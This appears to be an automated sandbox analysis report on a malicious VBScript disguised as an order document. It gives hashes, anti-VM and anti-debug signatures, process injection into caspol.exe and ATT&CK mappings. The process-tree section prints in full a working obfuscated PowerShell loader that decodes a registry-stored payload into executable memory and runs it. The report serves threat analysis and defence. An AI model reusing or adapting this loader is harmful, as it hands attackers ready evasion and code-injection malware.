a06b89ab8de11d1a00a2cfaafeafa96a84e1c867c9650d2574ab5c5965195ce8

General

Target

Order #K0137080.vbs
Size

236KB
MD5

96fab6f37daa6c05627d826d62db3199
SHA1

1ab3d160bc854e0cbc875438896c58d6c4c886b2
SHA256

1cd7d45d2466ce4a8220edc05bc8a9141e89f80e7e0f33ff61a6200011442bad
SHA512

059a9a60221f117f2258b14bfa218351f913156635e79751534256a1d9bc2867c0ced84f5bba3c4345c41e0aded7fde6471d1c294fc2569672010e31a88d9ccd
SSDEEP

6144:D78FFZJ4u+WvCjd2Zj21DL8rWl5/0ahnAMANPh:X8FP9XvCjd2h2tL0STVAdh

Score

7^/10

Malware Config

Signatures

Checks QEMU agent file 2 TTPs 2 IoCs

Checks presence of QEMU agent, possibly to detect virtualization.

Query Registry

T1012

System Information Discovery

T1082

Processes:

powershell.execaspol.exe

description	ioc	process
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	powershell.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	caspol.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\Control Panel\International\Geo\Nation	WScript.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.execaspol.exe

pid process

1480 powershell.exe
3800 caspol.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 1480 set thread context of 3800 1480 powershell.exe caspol.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

1480 powershell.exe
1480 powershell.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

1480 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1480 powershell.exe

pid	process
1480	powershell.exe
3800	caspol.exe

description	pid	process	target process
PID 1480 set thread context of 3800	1480	powershell.exe	caspol.exe

pid	process
1480	powershell.exe
1480	powershell.exe

pid	process
1480	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1480	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

Processes:

WScript.exepowershell.execsc.exe

description	pid	process	target process
PID 4656 wrote to memory of 2260	4656	WScript.exe	cmd.exe
PID 4656 wrote to memory of 2260	4656	WScript.exe	cmd.exe
PID 4656 wrote to memory of 1480	4656	WScript.exe	powershell.exe
PID 4656 wrote to memory of 1480	4656	WScript.exe	powershell.exe
PID 4656 wrote to memory of 1480	4656	WScript.exe	powershell.exe
PID 1480 wrote to memory of 224	1480	powershell.exe	csc.exe
PID 1480 wrote to memory of 224	1480	powershell.exe	csc.exe
PID 1480 wrote to memory of 224	1480	powershell.exe	csc.exe
PID 224 wrote to memory of 3180	224	csc.exe	cvtres.exe
PID 224 wrote to memory of 3180	224	csc.exe	cvtres.exe
PID 224 wrote to memory of 3180	224	csc.exe	cvtres.exe
PID 1480 wrote to memory of 3800	1480	powershell.exe	caspol.exe
PID 1480 wrote to memory of 3800	1480	powershell.exe	caspol.exe
PID 1480 wrote to memory of 3800	1480	powershell.exe	caspol.exe
PID 1480 wrote to memory of 3800	1480	powershell.exe	caspol.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Order #K0137080.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4656

C:\Windows\System32\cmd.exe
cmd /c echo C:\Users\Admin\AppData\Local\Temp\Order #K0137080.vbs
2⤵
PID:2260

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$Preenact = """DdeliAGrunddKimendDiape-KvaliTEksteyCrotapIndvaeCondu Cocob-CheerTSciuryPteropPerideIrritDHovedeScorpfRone iBludgnFfer iDokumtFriskiPilesoAscrinEndoc Amont'GravauFrmndsGaraniBoblenInfergKaste PeponSTreskyOtes sYattetPictoeEstremdokke;ApathuProbosnonphiSemannAffusgGalio PreobSPyrolyIntersArctotOvermeOctanmLiven.Futz RhopeluTribunUttertRunnyiOpilomUdpegeSlagp.deadmIMoltenFortotKvindeKrimirSlendoIsblopSlagsSSnurreFolkerPleurvStampiPrimfcUnneieAnmelsElekt;WrackpEmpatuAwashbPeopllBilfriDenigcTrego GgeunsDaledtVitupaShacktEnukkiKrydscDacty DepracMiljalSkraaanematsTabulsEctro VentaMInkluaQuatunBos SimorgefSknhe1Norma{Trots[ManicDModislrappelLeadwISrogamUnlikpNonsioRokkerSupertAndag(Bedoe`"""RyslegParacdNarraiUnroy3Amnes2Radil`"""Jerry)Topfo]inddapbumphuFlovmbconvelUntroitegnecFyrfa AbbiesRoisttanthoaKochatFlappiUdloecKlyng UnwhieIndhexSikketScungeElfhorConstnPearc PoppeiBedeknThy StBriga ProviGwellheAraujtContrRcopouaBromisStabltIdeogerininrStberiTannazSiddeeWicherZinobCserviaProtopHeptasUnsup(SerigiMarksnTeleotkende TyndtSFeriekOdwyeoDeclavFaikepmut dikrypt,FasciiAstarndvrgetPiete UnhitbAktiviSloppfDerovlForhaaPaasegPulah)Alema;Bevis[UdskrDFerrilTyroslGery ILitermPraespStrejoEmbalrDesertAftag(Theop`"""DriblgAaer dFormuiEcoph3Chiev2Nonma`"""Shaki)misfo]HjemmpBraseuchartbMedbelMirmeiSafiacKemik BrugesPredetponesaSkrmftSkibsiFele cforsk GenneeInfraxForsktLeen ePapegrTommenExtan BetaliCathynTorsktLitho omdmmSTeletePargolagtsoeZoostcAlpehtBeboeOvegnebTonefjClammeTubifcCellotSeise(MonaliObelinMelantMedga PorteOafflimAmylodCircuoHemoceDonac,DisoriPhilanArrastPropd AortaMklumsiUdmntnPolst)Momen;Brach[AntisDAttrilSkrgalSeineIDemasmsedatpRomanoCurrirCopoutSpejl(Undog`"""PitchkOphioeMigrarAnournBestyetrustlLengt3Konom2Gramn`"""Strut)alist]BumphpReliguTurbabSautelPunchiResetcOxidi AzeotsfilmstBagklaroyettInteriGeisocOphth AntiueBaccaxHandetAbstieHyperrTriannBaade MateriDaarlnGragetZanne DyrekVDistaiunglarAllotttarifuCoqueaPsykolOkkulAUnderlKlostlOverposlew cUrins(preniiNitinnForbitVbnen GerrivMagre1Optag,DeveriKomminDakoitForfi BoegevBropi2Toldb,StaveiTrypanStocktAttra FilmfvHjemm3Lepor,FumleiAristnsoulftUnder FrilgvAdpro4Vejgr)Kompe;Menth[AfprvDBetrnlgtterlAmoy IInflomCircupSmittoLonnirKolhotInter(Hvids`"""EskalgInsindnettoiFlyve3Pussc2Unfin`"""Affar)funge]bugsepFiskeuFodinbShootlByt KiSvklicbrutt InforsMispltmalthaTenzotSerieiByltecFamil AnimeeskavaxOpstatAfruneAgterrPulmonBevik KameliUnrecnKldevtUnhyp GrmmeGudvanefrilutGrandCDagdrhLanceaSenatrDragoAUnderBNeuroCVaporWFini ieleutdFintftTantahCostlsboota(TilveiPolycnPotamtDolle MilitRDriftuPerfoeLeechwMundh,OrnitiSyndinCinchtMinim Hova VPereseUnbelrRetsiiAlbat,DuelbiUnaffnHearttForby UnrusbThorbuPhearnMalaxgGudstaRomanlPosit,MelleiTimennAortatikraf LandsVGlasfoOverblforsi)Krlig;Atoma[AnqueDAdenolBiddalUdkigIBrskumBetrupFavoroEtaarrRefletStarc(Count`"""SubanuFacadsAsketelensbrUtjet3Rests2splen`"""Telev)Carke]CasaspOos HuBl WebPodoclafpreiPrecocRadio AppetsPosittKugleaBacchtUnpitiBlankcPermi JagtkeTrskexAnerktPastoeSubverNarronforel BagkliBendinBandetEgois RenotDHydrodCusk ebarkaKTrkkreSvrdleArmfupCrissSLaveltsmykkrmiljsiTarlanDiagrgProteHLandsacloudnPastrdRegnllFjogseSekst(SuppoiKlampnSpttetVatik sdet NModesoUnifinRecencMeathoPieti,ParapiDesinnUtaentFanta MenubCosciliParegsPewy )Flage;Escri[GobblDSkan lCantelAnthrIBrachmProfopVedlgoFimblrSerpetKomme(Pres `"""TransiRejfnmAllylmPjalt3Sabba2Slidf.SelvbdHollylFuldslbhind`"""Touzl)Engan]PhotopPattiuPattebPseudlMyremiStaascHaded barsesGennetAlarmaMaaletPac AifunktcProce SendeeJoas xMaanetPostgeFiffirDobbenResig genzaiSoignnPreditTjrne StancIPjattmFlaskmMisbiSVanadeGaabetDich CUnrecoSymbonAutonvDraweeForesrUnivesZoopaiMokkeoSubemnKolbaSForsytBaronaArtertUdbruuTheatsboyd (SamfuiBikagnPhlebtpeart AdmirRCatafeSeddesAlgeriEb GasUfuldtRecip,VarieiUdspnnOverrtforbr HogstCAnnotrFiffiyGrovepRefletZaireoUncer,disloiIndkbnNemmetMicro ExhalTSktteiPropigundecePullarCoate)Perip;Direc[DiagnDStjislOmforlLrlinIByvaamMerleprepleoMidverKvrultObol (Skjor`"""EupnokLegeneAntiprAtrabnTilskeSknlilConsa3Anoma2Germa`"""Ply F)Barfo]DeltipAltabuTittebGarb lAntihiThreacOverw FostesButiktSlvrvaBookbtVarskiLump cFupp LarsieOldfrxtalkotUncomegahnirUndernTelem AgoraiProgenIndkltForsi AdsorCCoffirLnpoteUnpolaHeftetDukkeeAmorpMSmuttaAnthriOomyclCuddisIndanlTomleoAmanitEnlig(paamniKrusnnOmslutKapgn MbundhIlloyoOxyphnPostgeComprySelvubForge,arcneiRadianTerpetTagpa UnlitKOrtodlresoraTerrnnShaitgBodyb,IndgriTankrnarsentProte LefthUUnisonAstroaForldnOverf,HardiiNyttenNonprtGlusi ServeHOverboTppersUbala)Undsa;Saltp[StmagDCoherlEkspalHugenIFaldlmNonflpPuppyogeninrOsciltBarra(Precr`"""TraadvHosesePrimfrAfpudsStoreiRias oFoedenSysta.betredDecallFlyndlkonge`"""Alter)Rytte]RestapOutskuTalenbOverslAnthriSkuddcHatch HjemksKomfotForceaCotratTappeiPalpucPseud HandleDiabrxKarbutAstroeinswarStenonBroma BathmidatabnOpvedtWheel TryklVmusteeMalicrPsychQPontouDiatreSellerprotoyGoniaVIntimaWaistlTrichuUborgePisto(DaleyiFistunVoxeltSedde SlibrCShoeloheteriChamininterarespe,TaleuiPantynUnmertBogsk ForsmGFortrubriannBeedofTragtotundruInez ,WeepiiKamarnTrieltLabor SnapsUWorlddPudsiecoronhRekapoCenoblPicul,BonifiToetanGrnsetSinec DelraAStetonEnkeltUranooBrunonPelar)Stret;Regen[NongeDBerenlHeliolInforIAnalymPhalapSkimpoInferrMelantPatte(Integ`"""frafawFleksiGangenFemetsPishopNoteloDialeoKurvelEmbar.DorindOvardrSkyldvUnexp`"""Photo)Svens]SnackpEvanguBidedbThulrlLypemiSamorcGruff HrsilsHogantCher aaabentWateriTubercPenal GranseDisplxLaksetFistueTransrFaconnBloms LocatiTopfonGlanstRadia MagenERegionSabotdBombaDKnopsoAppalcSindsPPetfurSanktiRaspenBrysttKonfoeSignarMatch(egoisiThorgnCelletnomad StuccUForurnConspsdeprecOverwoNedstwVaffe)Scrab;Indbe[MirroDParamlWhisklindesIOmkrsmGaranpmedvioFarmarTowd tSejrr(There`"""ParteuOvercsStanseAmortrGrund3Brygg2Inapp`"""Mavie)Annoy]GstefpChromuAgio bBenzilInderiFaarecsepte EnophssemidtTriviaThougtStormiRevapcMurme SkatteFarlexCancetReacqeFlexirPreomnValme PalaeiFidgenincuntmanoe OrkesSCompaeFedtrtSubatCFarfduDyschrQuartsMaqueoMyrderLongi(Sol LiFllesnFags tTydni LastvCcakewlRichaaTraitwidelrkPukleeUnpoe)Jerem;Tarta[SulevDNgleplJenbrlPentaIPubermstadspUnworoFormarBorsutPales(Ligeg`"""VolcakJacobeBarberBrainnManddeVasculVgtaf3Logge2Cente`"""Kulde)Sprng]BrummpAssenuUordeborganlMaleribrnehcColli FraissStilltSkillaPlushtKlik iVrgercLaven SacalecentrxBlasttCrimoeUsehorheilsnScyll AptotiuforlnMiswrtDiskf OverdLHulefoHailscDusinaHudiblForudFAhuaciSkolelcamboeFleriTLymphihalsemKolbjeDibasTPlasooUnderFRunabiChawklmuslieBambuTPostbiAfdelmBabbleGramm(KremeiChlornCymentMesos SvellDCynoprPoteniAntipvStjerhLeave,SplitiValgdnGonostDiato OpsliLTilliiCrimibFornyaBebudnLandziunder8Sinus6Heart)Didri;dagpe[BedveDDataslForgalAngreIAnatemPointpSmeltoErindrGenoptRefer(Hemat`"""ReffokPharieBeeferSprylnXenofeLuskelMakul3Overb2Palmi`"""Upaal)Bikin]HaandpTopsiuOrdrebBrdsklOphiaiExtracThatc HestesFremmtUsynlaStjfrtEnsafiForgrcBanne IntereViveuxAhisttInvareEngrorSorannAvlsh HjertiPeccanKuriotPremi SnigmLSpleeoBankfcTeletkAfskeRUnriteOttilsAarsaoGraviuPullmrChorecdefenePlade(NabosiDirkenLinnatLepto FrisvDTropprLilieidorsakVerde)umenn;Alaba[CliquDKretjlSclerlPanadIArbejmBrstepTahinoFlammrSkuretBogsk(Bruge`"""BoiesuNonacsSpejleAleutrOverd3Syven2Stamv`"""Overf)Disap]FugtipDoubluMakkebDescelReforiBrochcHyrek RyghvsOmegntKoloraMetabtFrkeniGriefcSben NdsteeUnderxSuicitAnthoeBrevfrNyhednEpacr LgnhaIFravrnabashtBehagPkelimtProverStorm MaskiEOstepnSynaguStyrmmSjuskWKommuiTeskenUdhngdNippooIngelwhaemoSKldertplannaSenattChurciTredjoTappenQueersTilvaWdiscr(SagsfuAuthoiSprannFiksatPorte LongjvAagot1Satir,SkrmfiNp DanBarartBookr NonicvAdept2Tease)Unive;Subfu}Awaft'Frems;Killi`$AngulMNaturaBlakknPrepriAbacifPrint3Havva=Mater[ManipMmonogaGnoffnBesluiSynopfHydro1eskim]Probl:Defin:ChimaVSpermiPheocrSlimitKaprouLandsaUdlodlSmigrAHeneqlTrundlSeddeoFgt GcPegox(Multi0Ortho,Emanc1Haben0Marke4Modej8Boxma5Flodd7Euphe6Wiene,Intet1Dipro2Precr2Umaad8Cyclo8Tykke,harpw6Scout4retro)Tular;Ligni`$VellyKQuickrDysidiIndlegBefroeRasperunfereIncinsMidwi=Prota(IntraGStreneCrofttLette-StereIaffaltBradyeIndfamPriggPDaymerRegntotypifptechneUdkogrSulfotManuryTospr Brygm-BronzPDanaiaVrtpltChamphtosse Inter'FortrHImmouKTolvfCKonomUzoolo:Plane\BestsFLycoprSkrifeUndermPisse\AgompLSickeuSolitxblottuCrownrModviiHetereServinparaktInfla1Refer1Canad9Subsa'Toldk)luftf.SharpHGruopjUninfeFoundrKahyttHutcheAcatafFyrst;Ety A`$SalmiOGeothnFalsnkDuefalItemieHjdeprTimorbTangerSnookeVanda Indva=Scutt Under[FiksfSUgtheySkravsHjerttBrandeEulogmOvera.KultiCBrancoBlindnFarvevAvlsbeOvercrTemaetVoldt]Unamo:Tidss:ElskeFSulforTotaloEncromPlaywBGarvyaOptimsSelskeDepre6Anagr4LeaveSFakultMucosrJourniBastanCretagBowel(Sixty`$TurboKFradrrGuldeiWeekegtilsyeAmatirDresseLangssCervi)Ethol;paask[AfspnSAssocyLnnensUdstttCoenaeGlacimBevog.paastRIncgruUnpacnSanaitCapiliBrunemlovgieFavou.MalprIDrmmenUselvtFrameeDekodrSolidoBullipRigtiSUnprueBrunhrExecrvProgriCatchcEftereYugossLawye.NondeMStaveaKoglerOffersInvadhArbejaEarpilBjrgn]Europ:Slutb:TurbiCTricaoJuglapGenneyDehon(Nonso`$HypaxOmedvinUdkankVidnelDulmeeDisilrUnderbOmpharEvigheUnder,Relse Decol0Resta,Binox Opfin Omega`$KasseMLingvaModifnUnderiThornfGodmo3Afkld,Lowmo Vansk`$UnwhiOKodesnFlngekkontulBronzePiberrVodenbMyelerAnakrepredi.CinercPrenaoHounduMagtfnStilltEpris)Razor;stryg[FolkeMPropeaMatrinJordtiSperlfLeksi1Untro]Maler:Toxos:PapirEHypernStabeuMerogmSkovtWBltesiInternJiffsdIntrvoLindrwprespSTempotligesaArveltIndiviTabeloMidt nGeronsMicroWRevol(Under`$KiwifMVersiaSelvanMultiiTomhofBelaa3Nya O,Fiske Ola S0Offsc)Frizz#Kurvb;""";Function Manif4 { param([String]$HS); For($i=5; $i -lt $HS.Length-1; $i+=(5+1)){ $Folker = $Folker + $HS.Substring($i, 1); } $Folker;}$Satinkla0 = Manif4 'SaaleIHindbEBelliXRamni ';$Satinkla1= Manif4 $Preenact;& ($Satinkla0) $Satinkla1;;"
2⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1480

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gwh34y30\gwh34y30.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:224

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5F27.tmp" "c:\Users\Admin\AppData\Local\Temp\gwh34y30\CSCC3BA3A278A2401EA9B19BAD50153F.TMP"
4⤵
PID:3180

C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe"
3⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3800

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

3

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES5F27.tmp
Filesize
1KB

MD5
ae7ee1603007ec4c8f34795fa3638ee8

SHA1
b119d609df356453f29c670c0c8adc7e452b6f22

SHA256
08d020b1b6025cc0903b096c542ba11e7a7cb8638fdbb9bfef8007e5cb5b3cdf

SHA512
df821a10abdaf1e653e8f0c239f22571adab90ab179523f3650a71072cb603c94e10e44fd3fcb098235e176e0047b5ccc77ecd83391ff7343be6e07b8de830ee

Download Submit
C:\Users\Admin\AppData\Local\Temp\gwh34y30\gwh34y30.dll
Filesize
4KB

MD5
4d1b39b0b183720b22646da6dd533f95

SHA1
b7f50c4f9f30c0a1575628c5f3d47ba7a9cd9c53

SHA256
5e0193dfb39ebd9dad0eadfbf2a06a06c0bfe182005e90cf247e56ab3ecccad1

SHA512
61a2545226474c5387e9f6c97ba94dd2ca39fea9815fe0012265aac9baa9f5444ebe7c3f99e9d4be06b75e062397b3d8669b1bfe87fa9a0665b7301f61c79bfa

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gwh34y30\CSCC3BA3A278A2401EA9B19BAD50153F.TMP
Filesize
652B

MD5
998dfc617e6c74f83c2638d342c1d35b

SHA1
342875d8e7d173677046d38579ff9205156f101a

SHA256
8f30ad36e60ff6446645ed8461adeca1733b86be65300cf38c3d308905d699dc

SHA512
19dda4aacf735f2eff22d31796dbf832992629e2412d0faea2e9c035112d369cd654510639dbac4b7a73e6be07ab7ff9b5c7234cd46914272e7bebd53a96c9b7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gwh34y30\gwh34y30.0.cs
Filesize
1KB

MD5
a1296b9b26069c44d0b493960cd2341a

SHA1
5df1108d08bce013f011876157746603e884a35e

SHA256
d004ed7b87a24a6af37088f2389a1b1fb1dcf42670190884ed616ab8f23d8148

SHA512
2912e622d5d6d600bb901c384930ef3ba9410befc370dfd7a30b0bda08c8dfbdc004733c8a328a3560eef7619102e3a1ee2870cd709558780b2eb8709efd9541

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gwh34y30\gwh34y30.cmdline
Filesize
369B

MD5
c5d91454e7f49f9cc737540b9a41f92b

SHA1
b836798d2d38c9bd281a5ee2a81c069902b2a7be

SHA256
941f93fe66d55777dfe59450c597a8f48b89165cce1426e424213a39f3447324

SHA512
ee3640355b3135d39dab97ee63e9b84d4809a46c86e399220e8dec948f913e2b8e31b5c853075ebcce588dcfee574afcc5d1a11f0e3bbb64623a0ff8ba52f60a

Download Submit
memory/224-142-0x0000000000000000-mapping.dmp

Download
memory/1480-139-0x0000000006060000-0x000000000607E000-memory.dmp

Filesize
120KB

Download
memory/1480-149-0x00000000073E0000-0x0000000007476000-memory.dmp

Filesize
600KB

Download
memory/1480-140-0x0000000007900000-0x0000000007F7A000-memory.dmp

Filesize
6.5MB

Download
memory/1480-141-0x0000000006580000-0x000000000659A000-memory.dmp

Filesize
104KB

Download
memory/1480-138-0x00000000051E0000-0x0000000005246000-memory.dmp

Filesize
408KB

Download
memory/1480-137-0x0000000005170000-0x00000000051D6000-memory.dmp

Filesize
408KB

Download
memory/1480-136-0x0000000004CD0000-0x0000000004CF2000-memory.dmp

Filesize
136KB

Download
memory/1480-158-0x0000000077360000-0x0000000077503000-memory.dmp

Filesize
1.6MB

Download
memory/1480-135-0x0000000005300000-0x0000000005928000-memory.dmp

Filesize
6.2MB

Download
memory/1480-134-0x0000000002650000-0x0000000002686000-memory.dmp

Filesize
216KB

Download
memory/1480-133-0x0000000000000000-mapping.dmp

Download
memory/1480-155-0x0000000077360000-0x0000000077503000-memory.dmp

Filesize
1.6MB

Download
memory/1480-150-0x0000000007370000-0x0000000007392000-memory.dmp

Filesize
136KB

Download
memory/1480-151-0x0000000008530000-0x0000000008AD4000-memory.dmp

Filesize
5.6MB

Download
memory/1480-152-0x00000000065D0000-0x00000000066D0000-memory.dmp

Filesize
1024KB

Download
memory/1480-153-0x00000000065D0000-0x00000000066D0000-memory.dmp

Filesize
1024KB

Download
memory/1480-154-0x00007FF9DC230000-0x00007FF9DC425000-memory.dmp

Filesize
2.0MB

Download
memory/2260-132-0x0000000000000000-mapping.dmp

Download
memory/3180-145-0x0000000000000000-mapping.dmp

Download
memory/3800-156-0x0000000000000000-mapping.dmp

Download
memory/3800-157-0x0000000000FC0000-0x00000000010C0000-memory.dmp

Filesize
1024KB

Download
memory/3800-159-0x0000000000FC0000-0x00000000010C0000-memory.dmp

Filesize
1024KB

Download
memory/3800-160-0x00007FF9DC230000-0x00007FF9DC425000-memory.dmp

Filesize
2.0MB

Download
memory/3800-161-0x0000000077360000-0x0000000077503000-memory.dmp

Filesize
1.6MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads